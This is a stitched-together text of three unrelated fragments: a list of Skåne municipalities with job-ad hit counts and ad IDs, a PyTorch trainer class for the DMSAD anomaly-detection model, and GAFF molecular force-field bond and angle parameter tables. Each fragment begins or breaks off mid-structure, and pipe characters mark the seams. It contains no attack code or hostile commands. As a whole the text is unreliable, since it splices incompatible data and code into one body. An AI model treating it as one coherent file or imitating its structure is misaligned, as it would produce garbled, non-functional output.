{'id': '5ohg_WJU_Ktn', 'name': 'Kävlinge', 'type': 'municipality', 'code': '1261', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 10,
'ad_ids': ['24645728', '24640743', '24637954', '24634361', '24631933', '24622076', '24615122', '24601405',
'24584558', '24570281']},
{'id': 'naG4_AUS_z2v', 'name': 'Lomma', 'type': 'municipality', 'code': '1262', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 10,
'ad_ids': ['24650188', '24649514', '24630578', '24607479', '24607474', '24593043', '24587683', '24555292',
'24549470', '24500680']},
{'id': 'n6r4_fjK_kRr', 'name': 'Svedala', 'type': 'municipality', 'code': '1263', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 4, 'ad_ids': ['24648311', '24624676', '24615959', '24590287']},
{'id': 'oezL_78x_r89', 'name': 'Skurup', 'type': 'municipality', 'code': '1264', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 4, 'ad_ids': ['24606877', '24596998', '24590239', '24555159']},
{'id': 'P3Cs_1ZP_9XB', 'name': 'Sjöbo', 'type': 'municipality', 'code': '1265', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 5, 'ad_ids': ['24636041', '24624217', '24572488', '24562106', '24415688']},
{'id': 'autr_KMa_cfp', 'name': 'Hörby', 'type': 'municipality', 'code': '1266', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 7,
'ad_ids': ['24647623', '24612427', '24598016', '24585770', '24576073', '24575956', '24388252']},
{'id': 'N29z_AqQ_Ppc', 'name': 'Höör', 'type': 'municipality', 'code': '1267', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 8,
'ad_ids': ['24645789', '24611931', '24590427', '24580373', '24533802', '24524712', '24505268', '24495006']},
{'id': 'UMev_wGs_9bg', 'name': 'Tomelilla', 'type': 'municipality', 'code': '1270', 'region_code': '12',
'region_name': '<NAME>', 'hits': 5, 'ad_ids': ['24629168', '24624712', '24621866', '24620688', '24616138']},
{'id': 'WMNK_PXa_Khm', 'name': 'Bromölla', 'type': 'municipality', 'code': '1272', 'region_code': '12',
'region_name': '<NAME>', 'hits': 8,
'ad_ids': ['24648756', '24645758', '24645101', '24624728', '24584175', '24582959', '24513573', '24513519']},
{'id': 'najS_Lvy_mDD', 'name': 'Osby', 'type': 'municipality', 'code': '1273', 'region_code': '12',
'region_name': '<NAME>', 'hits': 6,
'ad_ids': ['24622447', '24612064', '24590486', '24584265', '24570384', '24484317']},
{'id': 'BN7r_iPV_F9p', 'name': 'Perstorp', 'type': 'municipality', 'code': '1275', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 3, 'ad_ids': ['24644535', '24620267', '24590493']},
{'id': 'JARU_FAY_hTS', 'name': 'Klippan', 'type': 'municipality', 'code': '1276', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 11,
'ad_ids': ['24649729', '24645668', '24630230', '24630125', '24627948', '24613981', '24602922', '24592988',
'24587696', '24576122']},
{'id': 'tEv6_ktG_QQb', 'name': 'Åstorp', 'type': 'municipality', 'code': '1277', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 7,
'ad_ids': ['24646009', '24643953', '24611585', '24576459', '24572768', '24572674', '24488210']},
{'id': 'i8vK_odq_6ar', 'name': 'Båstad', 'type': 'municipality', 'code': '1278', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 6,
'ad_ids': ['24648777', '24642713', '24635648', '24546923', '24546926', '24437820']},
{'id': 'oYPt_yRA_Smm', 'name': 'Malmö', 'type': 'municipality', 'code': '1280', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 208,
'ad_ids': ['24650545', '24650520', '24650296', '24650097', '24650060', '24649950', '24648137', '24647586',
'24647704', '24647414']},
{'id': 'muSY_tsR_vDZ', 'name': 'Lund', 'type': 'municipality', 'code': '1281', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 94,
'ad_ids': ['24650438', '24650135', '24649589', '24648781', '24647011', '24647010', '24646930', '24646668',
'24645906', '24645894']},
{'id': 'Yt5s_Vf9_rds', 'name': 'Landskrona', 'type': 'municipality', 'code': '1282', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 13,
'ad_ids': ['24644146', '24644087', '24620576', '24620131', '24615771', '24573791', '24570452', '24567461',
'24540874', '24488640']},
{'id': 'qj3q_oXH_MGR', 'name': 'Helsingborg', 'type': 'municipality', 'code': '1283', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 75,
'ad_ids': ['24649269', '24648344', '24647195', '24645865', '24645699', '24644730', '24644155', '24643877',
'24643808', '24643688']},
{'id': '8QQ6_e95_a1d', 'name': 'Höganäs', 'type': 'municipality', 'code': '1284', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 5, 'ad_ids': ['24634533', '24625162', '24623134', '24620349', '24576341']},
{'id': 'gfCw_egj_1M4', 'name': 'Eslöv', 'type': 'municipality', 'code': '1285', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 7,
'ad_ids': ['24634664', '24629637', '24616790', '24608987', '24607603', '24603214', '24500582']},
{'id': 'hdYk_hnP_uju', 'name': 'Ystad', 'type': 'municipality', 'code': '1286', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 11,
'ad_ids': ['24644036', '24625823', '24601172', '24599304', '24583510', '24574648', '24572130', '24511562',
'24511260', '24473915']},
{'id': 'STvk_dra_M1X', 'name': 'Trelleborg', 'type': 'municipality', 'code': '1287', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 18,
'ad_ids': ['24649417', '24645920', '24645911', '24640015', '24632826', '24630587', '24614377', | |
import torch
import torch.nn as nn
import torch.optim as optim
import numpy as np
import time
import logging
from sklearn.metrics import roc_auc_score
from sklearn.cluster import KMeans
from sklearn.manifold import TSNE
from src.models.optim.Loss_Functions import DMSADLoss
from src.utils.utils import print_progessbar
class DMSAD_trainer:
"""
Trainer for the DMSAD.
"""
def __init__(self, c, R, eta=1.0, gamma=0.05, n_sphere_init=100, n_epoch=150,
lr=1e-4, lr_milestone=(), batch_size=64, weight_decay=1e-6,
device='cuda', n_job_dataloader=0, print_batch_progress=False):
"""
Constructor of the DMSAD trainer.
----------
INPUT
|---- c (array like N_sphere x Embed dim) the centers of the hyperspheres.
| If None, the centers are initialized using Kmeans.
|---- R (1D array) the radii associated with the centers.
|---- eta (float) the weight of semi-supervised labels in the loss.
|---- gamma (float) the fraction of allowed outlier when setting the
| radius of each sphere in the end.
|---- n_sphere_init (int) the number of initial hypersphere.
|---- n_epoch (int) the number of epoch.
|---- lr (float) the learning rate.
|---- lr_milestone (tuple) the lr update steps.
|---- batch_size (int) the batch_size to use.
|---- weight_decay (float) the weight_decay for the Adam optimizer.
|---- device (str) the device to work on ('cpu' or 'cuda').
|---- n_job_dataloader (int) number of workers for the dataloader.
|---- print_batch_progress (bool) whether to dispay the batch
| progress bar.
OUTPUT
|---- None
"""
# learning parameters
self.n_epoch = n_epoch
self.lr = lr
self.lr_milestone = lr_milestone
self.batch_size = batch_size
self.weight_decay = weight_decay
self.device = device
self.n_job_dataloader = n_job_dataloader
self.print_batch_progress = print_batch_progress
# DMSAD parameters
self.c = torch.tensor(c, device=self.device) if c is not None else None
self.R = torch.tensor(R, device=self.device) if R is not None else None
self.eta = eta
self.gamma = gamma
self.n_sphere_init = n_sphere_init
# Optimization parameters
self.eps = 1e-6
# Results
self.train_time = None
self.train_loss = None
self.eval_auc = None
self.eval_time = None
self.eval_scores = None
def train(self, dataset, net, valid_dataset=None):
"""
Train the DMSAD network on the provided dataset.
----------
INPUT
|---- dataset (torch.utils.data.Dataset) the dataset on which the
| network is trained. It must return an image, label, mask
| semi-supervized labels and the index.
|---- net (nn.Module) The DeepSAD to train.
|---- valid_dataset (torch.utils.data.Dataset) the dataset on which
| to validate the network at each epoch. Not validated if
| not provided.
OUTPUT
|---- net (nn.Module) The trained DeepSAD.
"""
logger = logging.getLogger()
# make the train dataloader
train_loader = torch.utils.data.DataLoader(dataset, batch_size=self.batch_size, \
shuffle=True, num_workers=self.n_job_dataloader)
# put net to device
net = net.to(self.device)
# initialize hypersphere center
if self.c is None:
logger.info(' Initializing the hypersphere centers.')
self.initialize_centers(train_loader, net)
logger.info(f' {self.c.shape[0]} centers successfully initialized.')
# define loss criterion
loss_fn = DMSADLoss(self.eta, eps=self.eps)
# define optimizer
optimizer = optim.Adam(net.parameters(), lr=self.lr, weight_decay=self.weight_decay)
# define scheduler
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=self.lr_milestone, gamma=0.1)
# Start training
logger.info('Start Training the DMSAD.')
start_time = time.time()
epoch_loss_list = []
n_batch = len(train_loader)
for epoch in range(self.n_epoch):
net.train()
epoch_loss = 0.0
epoch_start_time = time.time()
n_k = torch.zeros(self.c.shape[0], device=self.device)
for b, data in enumerate(train_loader):
# get input and semi-supervized labels
input, _, _, semi_label, _ = data
# put them to device
input = input.to(self.device).float().requires_grad_(True)
semi_label = semi_label.to(self.device)
# zero the network's gradients
optimizer.zero_grad()
# optimize by backpropagation
_, embed = net(input)
loss = loss_fn(embed, self.c, semi_label)
loss.backward()
optimizer.step()
epoch_loss += loss.item()
# get the closest sphere and count the number of normal samples per sphere
idx = torch.argmin(torch.norm(self.c.unsqueeze(0) - embed.unsqueeze(1), p=2, dim=2), dim=1)
for i in idx[semi_label != -1]:
n_k[i] += 1
if self.print_batch_progress:
print_progessbar(b, len(train_loader), Name='\t\tTrain Batch', Size=40, erase=True)
# remove centers with less than gamma fraction of largest hypersphere number of sample
self.c = self.c[n_k >= self.gamma * torch.max(n_k)]
# validate if required
valid_auc = ''
if valid_dataset:
auc = self.evaluate(net, valid_dataset, return_auc=True, print_to_logger=False, save_tSNE=False)
valid_auc = f' Valid AUC {auc:.3%} |'
# log the epoch statistics
logger.info(f'----| Epoch: {epoch + 1:03}/{self.n_epoch:03} '
f'| Train Time: {time.time() - epoch_start_time:.3f} [s] '
f'| Train Loss: {epoch_loss / n_batch:.6f} '
f'| N sphere {self.c.shape[0]:03} |' + valid_auc)
epoch_loss_list.append([epoch+1, epoch_loss/n_batch])
# update scheduler
scheduler.step()
if epoch + 1 in self.lr_milestone:
logger.info(f'---- LR Scheduler : new learning rate {scheduler.get_lr()[0]:g}')
# Set the radius of each sphere as 1-gamma quantile of normal samples distances
logger.info(f'---- Setting the hyperspheres radii as the {1-self.gamma:.1%} quantiles of normal sample distances.')
self.set_radius(train_loader, net)
logger.info(f'---- {self.R.shape[0]} radii successufully defined.')
# End training
self.train_loss = epoch_loss_list
self.train_time = time.time() - start_time
logger.info(f'---- Finished Training DMSAD in {self.train_time:.3f} [s]')
return net
def evaluate(self, net, dataset, return_auc=False, print_to_logger=True, save_tSNE=True):
"""
Evaluate the DSAD network on the provided dataset.
----------
INPUT
|---- net (nn.Module) The DMSAD network to validate.
|---- dataset (torch.utils.data.Dataset) the dataset on which the
| network is evaluated.
|---- return_auc (bool) whether to return the computed auc or not.
|---- print_to_logger (bool) whether to print in the logger.
|---- save_tSNE (bool) whether to save a 2D t-SNE representation of
| the embeded data points
OUTPUT
|---- (auc) (float) the validation auc if required.
"""
if print_to_logger:
logger = logging.getLogger()
# make dataloader
loader = torch.utils.data.DataLoader(dataset, batch_size=self.batch_size,
shuffle=True, num_workers=self.n_job_dataloader)
# put net on device
net = net.to(self.device)
# Evaluating
if print_to_logger:
logger.info('Start Evaluating the DMSAD.')
start_time = time.time()
idx_label_score = []
net.eval()
with torch.no_grad():
for b, data in enumerate(loader):
# get data on device
input, label, _, semi_label, idx = data
input = input.to(self.device).float()
label = label.to(self.device)
semi_label = semi_label.to(self.device)
idx = idx.to(self.device)
# Embed input and compute anomaly score
_, embed = net(input)
# find closest sphere
score, sphere_idx = torch.min(torch.norm(self.c.unsqueeze(0) - embed.unsqueeze(1), p=2, dim=2), dim=1)
# append idx, scores, label and embeding
idx_label_score += list(zip(idx.cpu().data.numpy().tolist(),
label.cpu().data.numpy().tolist(),
score.cpu().data.numpy().tolist(),
sphere_idx.cpu().data.numpy().tolist(),
embed.cpu().data.numpy().tolist()))
if self.print_batch_progress:
print_progessbar(b, len(loader), Name='\t\t Evaluation Batch', Size=40, erase=True)
# compute AUCs
index, label, score, sphere_index, embed = zip(*idx_label_score)
label, score = np.array(label), np.array(score)
auc = roc_auc_score(label, score)
if save_tSNE:
embed = np.array(embed)
embed = TSNE(n_components=2).fit_transform(embed)
idx_label_score = list(zip(index, label.tolist(), score.tolist(), sphere_index, embed.tolist()))
self.eval_time = time.time() - start_time
self.eval_scores = idx_label_score
self.eval_auc = auc
if print_to_logger:
logger.info(f'Evaluation Time : {self.eval_time}')
logger.info(f'Evaluation AUC : {self.eval_auc:.3%}')
logger.info('Finished Evaluating the DMSAD.')
if return_auc:
return auc
def initialize_centers(self, loader, net, eps=0.1):
"""
Initialize the multiple centers using the K-Means algorithm on the
embedding of all the normal samples.
----------
INPUT
|---- loader (torch.utils.data.Dataloader) the loader of the data.
|---- net (nn.Module) the DMSAD network. The output must be a vector
| embedding of the input. The network should be an
| autoencoder for which the forward pass returns both the
| reconstruction and the embedding of the input.
|---- eps (float) minimal value for center coordinates, to avoid
| center too close to zero.
OUTPUT
|---- None
"""
# Get sample embedding
repr = []
net.eval()
with torch.no_grad():
for b, data in enumerate(loader):
# get data
input, _, _, semi_label, _ = data
input = input.to(self.device).float()
semi_label = semi_label.to(self.device)
# keep only normal samples
input = input[semi_label != -1]
# get embdeding of batch
_, embed = net(input)
repr.append(embed)
if self.print_batch_progress:
print_progessbar(b, len(loader), Name='\t\tBatch', Size=40, erase=True)
repr = torch.cat(repr, dim=0).cpu().numpy()
# Apply Kmeans algorithm on embedding
kmeans = KMeans(n_clusters=self.n_sphere_init).fit(repr)
self.c = torch.tensor(kmeans.cluster_centers_).to(self.device)
# check if c_i are epsilon too close to zero to avoid them to be trivialy matched to zero
self.c[(torch.abs(self.c) < eps) & (self.c < 0)] = -eps
self.c[(torch.abs(self.c) < eps) & (self.c > 0)] = eps
def set_radius(self, loader, net):
"""
compute radius as 1-gamma quatile of normal sample distance to center.
Then anomaly score is ||net(x) - c_j||^2 - R_j^2 <--- negative if in, positive if out.
----------
INPUT
|---- loader (torch.utils.data.Dataloader) the loader of the data.
|---- net (nn.Module) the DMSAD network. The output must be a vector
| embedding of the input. The network should be an
| autoencoder for which the forward pass returns both the
| reconstruction and the embedding of the input.
OUTPUT
|---- None
"""
dist_list = [[] for _ in range(self.c.shape[0])] # initialize N_sphere lists
net.eval()
with torch.no_grad():
for b, data in enumerate(loader):
# get data
input, _, _, semi_label, _ = | |
5/2017 2 0.0004
c -ni 292.3 1.4330 5/2017 3 0.0055
cy-n2 301.9 1.4240 5/2017 3 0.0008
op-p5 342.6 1.6180 5/2017 3 0.0012
cx-sp 190.9 1.8240 5/2017 3 0.0172
hn-nl 442.6 1.0480 5/2017 3 0.0410
nn-p5 279.9 1.6650 5/2017 2
nj-p5 208.6 1.7630 5/2017 2 0.0519
cc-sq 218.4 1.7770 5/2017 3 0.0006
c2-cv 484.2 1.3330 5/2017 2 0.0002
c1-cy 299.1 1.4640 5/2017 3 0.0061
cy-i 93.4 2.1910 5/2017 3 0.0116
oq-p5 270.6 1.6940 5/2017 4 0.0003
nj-os 187.4 1.3980 5/2017 2 0.0028
op-op 80.1 1.5970 5/2017 2 0.0081
cy-p5 153.7 1.8910 5/2017 2
cy-sx 171.8 1.8620 5/2017 1
cx-i 94.2 2.1870 5/2017 2 0.0025
cx-no 231.9 1.4990 5/2017 1
ce-cu 535.9 1.3070 5/2017 2 0.0055
np-sy 270.6 1.7340 5/2017 2 0.0135
cl-nj 162.6 1.7250 5/2017 2
np-s6 226.6 1.7950 5/2017 2 0.0042
np-op 139.3 1.4810 5/2017 2 0.0016
cl-np 132.9 1.7940 5/2017 2 0.0014
cx-p5 178.4 1.8370 5/2017 2 0.0063
cl-cv 188.6 1.7380 5/2017 2 0.0089
cv-nh 369.6 1.3690 5/2017 2 0.0397
nq-s4 270.6 1.7340 5/2017 2
c3-nl 224.9 1.5080 5/2017 2 0.0085
np-p3 212.3 1.7570 5/2017 1
cu-f 404.8 1.3140 5/2017 2
c -sq 190.4 1.8250 5/2017 1
cu-os 409.3 1.3340 5/2017 1
cy-sh 184.1 1.8370 5/2017 1
cv-oq 270.5 1.4460 5/2017 1
cu-cv 529.6 1.3100 5/2017 1
c1-nj 403.3 1.3460 5/2017 1
cu-ne 543.7 1.2700 5/2017 1
cu-op 430.5 1.3210 5/2017 1
s6-sp 244.8 2.0780 5/2017 1
sp-sp 218.8 2.1240 5/2017 1
cv-ne 577.9 1.2550 5/2017 1
op-s6 390.9 1.6200 5/2017 1
op-sp 191.1 1.8620 5/2017 1
c1-cv 538.0 1.3060 5/2017 1
n2-nj 275.4 1.3790 5/2017 1
nq-nq 182.5 1.4940 5/2017 1
cv-p3 193.6 1.8080 5/2017 1
cv-p5 281.6 1.6810 5/2017 1
np-os 163.8 1.4350 5/2017 1
nj-nq 206.1 1.4590 5/2017 1
no-nq 303.7 1.3530 5/2017 1
cy-sy 177.6 1.8500 5/2017 1
ce-nm 330.7 1.3990 5/2017 1
cv-os 359.7 1.3680 5/2017 1
cy-n1 298.6 1.4270 5/2017 1
c -op 423.8 1.3250 5/2017 1
cv-n2 539.3 1.2720 5/2017 1
cx-oq 280.3 1.4360 5/2017 1
cx-n1 339.3 1.3920 5/2017 1
""")
gaff_angles = dedent("""
hw-ow-hw 100.0 104.52 AMBER 1
hw-hw-ow 0.0 127.74 AMBER 1
br-c1-br 58.4 180.00 Guess 0
br-c1-c1 56.1 180.00 SOURCE3 1
c1-c1-c1 65.5 180.00 SOURCE3 1
c1-c1-c2 62.5 180.00 SOURCE3 2
c1-c1-c3 58.0 178.51 SOURCE4_SOURCE5 618 0.7369
c1-c1-ca 58.5 180.00 SOURCE3 1
c1-c1-cl 63.9 180.00 SOURCE3 1
c1-c1-f 80.7 180.00 SOURCE3 1
c1-c1-ha 44.8 179.11 SOURCE3_SOURCE5 219 0.5885
c1-c1-hc 44.8 180.00 SOURCE3 1
c1-c1-i 53.0 180.00 SOURCE3 1
c1-c1-n1 83.6 180.00 SOURCE3 1
c1-c1-n2 82.1 180.00 SOURCE3 1
c1-c1-n3 76.7 180.00 SOURCE3 1
c1-c1-n4 74.2 179.56 SOURCE3 3 0.3096
c1-c1-n 78.0 177.18 SOURCE3 1
c1-c1-na 76.9 176.75 SOURCE3 8 2.9328
c1-c1-nh 77.1 179.27 SOURCE3 3 0.2357
c1-c1-no 74.6 180.00 SOURCE3 3
c1-c1-o 82.9 180.00 SOURCE3 1
c1-c1-oh 78.2 176.65 SOURCE3 1
c1-c1-os 78.5 176.93 SOURCE3_SOURCE5 5 1.1927
c1-c1-p2 68.2 180.00 SOURCE3 1
c1-c1-p3 69.4 169.63 SOURCE3 2
c1-c1-p4 67.4 180.00 SOURCE3 1
c1-c1-p5 69.5 176.17 SOURCE3 2
c1-c1-s4 55.8 167.47 SOURCE3 2
c1-c1-s6 55.4 174.38 SOURCE3 2
c1-c1-s 58.1 179.97 SOURCE3 1
c1-c1-sh 55.8 180.00 SOURCE3 1
c1-c1-ss 56.2 175.60 SOURCE3_SOURCE5 19 1.3679
c2-c1-c2 60.2 179.37 SOURCE3_SOURCE5 14 0.3391
c2-c1-ce 60.0 179.05 SOURCE4_SOURCE5 15 0.4210
c2-c1-n1 79.3 180.00 HF/6-31G* 1
c2-c1-o 79.0 179.50 SOURCE2 1
c2-c1-s2 58.5 172.98 SOURCE3 1
c3-c1-c3 53.5 180.00 Guess 0
c3-c1-cg 57.8 178.43 SOURCE4_SOURCE5 134 0.5502
c3-c1-n1 73.2 178.58 SOURCE4_SOURCE5 245 0.5409
ca-c1-ca 54.5 180.00 Guess 0
c -c1-c1 57.9 180.00 SOURCE3 1
cg-c1-ha 44.4 178.83 SOURCE3_SOURCE5 60 1.1251
ch-c1-ha 44.3 178.83 SOURCE3_SOURCE5 38 0.3321
cl-c1-cl 70.2 180.00 Guess 0
f -c1-f 99.8 180.00 Guess 0
i -c1-i 58.4 180.00 Guess 0
n1-c1-n1 141.8 102.01 SOURCE3 1
n1-c1-n3 98.4 176.01 SOURCE2_SOURCE5 5 0.1498
n1-c1-nh 98.2 177.65 SOURCE4_SOURCE5 18 0.7845
n1-c1-os 99.2 178.59 SOURCE3 1
n1-c1-p3 86.6 171.20 SOURCE2 1
n1-c1-ss 70.1 177.47 SOURCE3_SOURCE5 15 0.7211
n2-c1-n2 102.9 180.00 Guess 0
n2-c1-o 106.1 172.73 SOURCE3_SOURCE5 10 0.3647
n2-c1-s 73.6 175.91 SOURCE4_SOURCE5 29 0.2046
n3-c1-n3 91.4 180.00 Guess 0
n4-c1-n4 86.9 180.00 Guess 0
na-c1-na 90.4 180.00 Guess 0
ne-c1-o 106.0 172.33 SOURCE3 1
ne-c1-s 73.6 175.82 SOURCE4_SOURCE5 23 0.2168
nf-c1-o 106.0 172.33 SOURCE3 1
nh-c1-nh 91.7 180.00 Guess 0
n -c1-n 92.6 180.00 Guess 0
no-c1-no 87.6 180.00 Guess 0
oh-c1-oh 92.9 180.00 Guess 0
o -c1-o 105.0 180.00 Guess 0
os-c1-os 93.4 180.00 Guess 0
p2-c1-p2 85.4 180.00 Guess 0
p3-c1-p3 84.4 180.00 Guess 0
p4-c1-p4 84.4 180.00 Guess 0
p5-c1-p5 86.2 180.00 Guess 0
s2-c1-s2 57.5 180.00 Guess 0
s4-c1-s4 52.6 180.00 Guess 0
s6-c1-s6 53.3 180.00 Guess 0
sh-c1-sh 54.6 180.00 Guess 0
s -c1-s 57.2 180.00 Guess 0
ss-c1-ss 54.3 180.00 Guess 0
br-c2-br 69.0 115.06 SOURCE3 1
br-c2-c2 64.5 121.03 SOURCE4_SOURCE5 18 0.8426
br-c2-c3 64.8 115.32 SOURCE4_SOURCE5 18 0.6855
br-c2-ce 64.3 121.53 SOURCE4_SOURCE5 18 0.7036
br-c2-h4 42.8 113.73 SOURCE4_SOURCE5 17 0.5888
br-c2-ha 42.9 113.28 SOURCE3 1
c1-c2-c1 74.6 116.77 SOURCE3 1
c1-c2-c2 72.3 121.62 SOURCE3 1
c1-c2-c3 66.2 124.90 SOURCE4_SOURCE5 44 0.7045
c1-c2-f 90.5 124.90 SOURCE2 1
c1-c2-ha 51.1 120.42 SOURCE3_SOURCE5 30 0.4602
c2-c2-c2 71.5 121.81 SOURCE3 10 0.3843
c2-c2-c3 66.1 123.63 SOURCE3_SOURCE5 4623 2.2803
c2-c2-ca 71.6 117.00 SOURCE3 1
c2-c2-cc 72.2 117.21 SOURCE3 2 0.3418
c2-c2-cd 72.2 117.21 SOURCE3 2
c2-c2-cl 72.3 123.11 SOURCE4_SOURCE5 103 1.0574
c2-c2-cx 66.5 124.81 5/2017 39 1.8529
c2-c2-cy 67.5 118.44 5/2017 11 1.7549
c2-c2-f 90.3 122.87 SOURCE4_SOURCE5 37 0.6494
c2-c2-h4 49.9 122.67 SOURCE4_SOURCE5 266 1.3387
c2-c2-ha 50.4 120.43 SOURCE3_SOURCE5 3764 1.3300
c2-c2-hc 50.5 119.70 SOURCE3 1
c2-c2-hx 49.2 126.45 SOURCE3 3 0.0219
c2-c2-i 59.3 121.03 SOURCE3 2
c2-c2-n1 90.1 122.98 HF/6-31G* 1
c2-c2-n2 89.8 126.01 SOURCE3 1
c2-c2-n3 88.4 124.55 SOURCE3 1
c2-c2-n4 83.4 121.52 SOURCE3 5 1.2656
c2-c2-n 86.7 123.67 SOURCE4_SOURCE5 48 1.8326
c2-c2-na 87.2 121.94 SOURCE3_SOURCE5 35 5.4059
c2-c2-nh 86.7 124.99 SOURCE3 7 0.9929
c2-c2-no 85.1 123.46 SOURCE4_SOURCE5 26 1.6311
c2-c2-o 89.8 130.89 SOURCE3 2 0.0201
c2-c2-oh 89.3 122.17 SOURCE4_SOURCE5 18 1.1206
c2-c2-os 88.7 121.87 SOURCE4_SOURCE5 114 1.6810
c2-c2-p2 88.5 115.10 SOURCE3 1
c2-c2-p3 78.6 124.83 SOURCE3 5 2.1222
c2-c2-p4 80.7 119.76 SOURCE3 1
c2-c2-p5 77.1 125.97 SOURCE3 1
c2-c2-s4 64.7 119.84 SOURCE3 1
c2-c2-s6 64.7 120.01 SOURCE3 1
c2-c2-s 63.1 129.37 SOURCE3 2
c2-c2-sh 62.6 125.70 SOURCE3 3 1.3390
c2-c2-ss 64.8 122.35 SOURCE4_SOURCE5 54 2.2017
c3-c2-c3 64.9 115.65 SOURCE3_SOURCE5 1743 1.5647
c3-c2-cc 65.3 125.19 CORR_SOURCE5 50 1.5929
c3-c2-cd 65.3 125.19 CORR_SOURCE5 50 1.5929
c3-c2-ce 66.1 123.15 CORR_SOURCE5 2644 2.0746
c3-c2-cf 66.1 123.15 CORR_SOURCE5 2644 2.0746
c3-c2-h4 45.8 119.02 SOURCE4_SOURCE5 63 1.6077
c3-c2-ha 46.4 115.68 SOURCE3_SOURCE5 3991 1.1961
c3-c2-hc 45.6 120.00 SOURCE3 1
c3-c2-n2 84.0 123.43 SOURCE4_SOURCE5 388 2.3609
c3-c2-n 84.4 114.80 SOURCE4 12 1.8112
c3-c2-na 83.5 117.20 SOURCE3_SOURCE5 5 0.8937
c3-c2-ne 84.7 120.71 SOURCE3_SOURCE5 11 0.9157
c3-c2-nf 84.7 120.71 SOURCE3_SOURCE5 7 1.3134
c3-c2-nh 84.2 116.21 SOURCE3_SOURCE5 339 2.4814
c3-c2-o 85.2 122.82 SOURCE4_SOURCE5 12 1.1220
c3-c2-oh 85.7 115.16 SOURCE4_SOURCE5 90 2.0675
c3-c2-os 86.1 112.80 SOURCE4_SOURCE5 148 2.4217
c3-c2-p2 82.6 122.74 SOURCE3 2
c3-c2-s 64.7 115.44 SOURCE3 2 0.0115
c3-c2-ss 63.5 119.66 SOURCE4_SOURCE5 137 2.1299
ca-c2-ca 70.1 117.88 SOURCE3 1
ca-c2-hc 48.4 123.30 SOURCE3 1
c -c2-c2 69.9 120.70 SOURCE3 1
c -c2-c3 65.9 119.70 SOURCE3 1
c -c2-c 68.7 118.88 SOURCE3 1
cc-c2-h4 49.8 119.85 SOURCE4_SOURCE5 23 0.5829
cc-c2-ha 50.0 118.75 SOURCE3_SOURCE5 72 1.1667
cc-c2-nh 86.6 123.12 SOURCE4_SOURCE5 27 1.0384
cc-c2-o 91.4 123.59 SOURCE4_SOURCE5 12 0.0560
cd-c2-ha 50.0 118.75 SOURCE3_SOURCE5 72 1.1667
ce-c2-cl 72.1 123.47 SOURCE4_SOURCE5 41 0.8440
ce-c2-h4 49.7 122.31 SOURCE4_SOURCE5 220 1.5462
ce-c2-ha 50.0 120.45 SOURCE3_SOURCE5 2139 1.1520
ce-c2-na 86.1 124.17 SOURCE4_SOURCE5 12 1.9766
ce-c2-nh 87.8 120.71 SOURCE4_SOURCE5 243 2.3407
ce-c2-no 86.1 119.65 SOURCE4_SOURCE5 10 0.9817
ce-c2-o 92.0 123.37 SOURCE4_SOURCE5 14 0.7592
ce-c2-oh 88.6 123.13 SOURCE4_SOURCE5 104 1.7734
ce-c2-os 88.0 122.80 SOURCE4_SOURCE5 149 2.3406
cf-c2-ha 50.0 120.45 SOURCE3_SOURCE5 2017 1.1895
c -c2-ha 48.2 121.33 SOURCE3 4 0.2462
c -c2-hc 48.5 119.70 SOURCE3 1
cl-c2-cl 83.0 114.34 SOURCE4_SOURCE5 29 0.6417
cl-c2-h4 49.5 113.54 SOURCE4_SOURCE5 33 0.7337
cl-c2-ha 49.6 113.20 SOURCE3 1
cx-c2-ha 47.0 116.23 5/2017 49 1.0274
f -c2-f 120.2 111.64 SOURCE2_SOURCE5 12 0.8567
f -c2-ha 66.8 110.00 SOURCE2 1
h4-c2-n2 64.8 120.99 SOURCE4_SOURCE5 77 1.9305
h4-c2-n 62.6 113.44 SOURCE4_SOURCE5 78 1.0580
h4-c2-na 62.7 112.97 SOURCE4_SOURCE5 27 0.6876
h4-c2-ne 64.9 119.51 SOURCE4_SOURCE5 52 1.6395
h4-c2-nh 62.6 115.08 SOURCE4_SOURCE5 109 1.1974
h4-c2-no 60.9 113.38 SOURCE4_SOURCE5 20 0.1373
h4-c2-os 64.0 113.73 SOURCE3_SOURCE5 89 1.3113
h4-c2-ss 43.6 116.67 SOURCE3_SOURCE5 49 1.4612
h5-c2-n2 64.5 121.70 SOURCE4_SOURCE5 71 2.1538
h5-c2-na 59.2 126.39 SOURCE3 4 0.3299
h5-c2-ne 64.7 119.85 SOURCE4_SOURCE5 44 1.3576
h5-c2-nh 62.9 113.91 SOURCE4_SOURCE5 119 0.8516
ha-c2-ha 37.7 116.90 SOURCE3_SOURCE5 1456 0.6313
ha-c2-n1 64.0 120.76 SOURCE3 8 0.6632
ha-c2-n2 64.9 120.54 SOURCE3 92 1.4571
ha-c2-n3 64.7 113.54 SOURCE3 1
ha-c2-n 62.6 113.40 SOURCE3 4 1.2182
ha-c2-na 62.8 112.42 SOURCE3 8 0.6507
ha-c2-ne 64.4 121.18 SOURCE3 68 0.6824
ha-c2-nf 64.4 121.18 SOURCE3 68
ha-c2-nh 62.2 116.68 SOURCE3 13 2.5734
ha-c2-no 61.2 112.14 SOURCE3 2 0.0264
ha-c2-o 67.9 117.23 SOURCE3 2 0.0201
ha-c2-oh 64.1 116.18 SOURCE3 2
ha-c2-os 64.3 112.69 SOURCE3 13 2.5851
ha-c2-p2 57.1 121.48 SOURCE3 122 0.4329
ha-c2-p3 53.3 114.31 SOURCE3 3
ha-c2-p4 52.8 117.86 SOURCE3 1
ha-c2-p5 52.0 116.00 SOURCE3_SOURCE5 6 0.1220
ha-c2-pe 56.4 121.40 SOURCE3_SOURCE5 119 0.8904
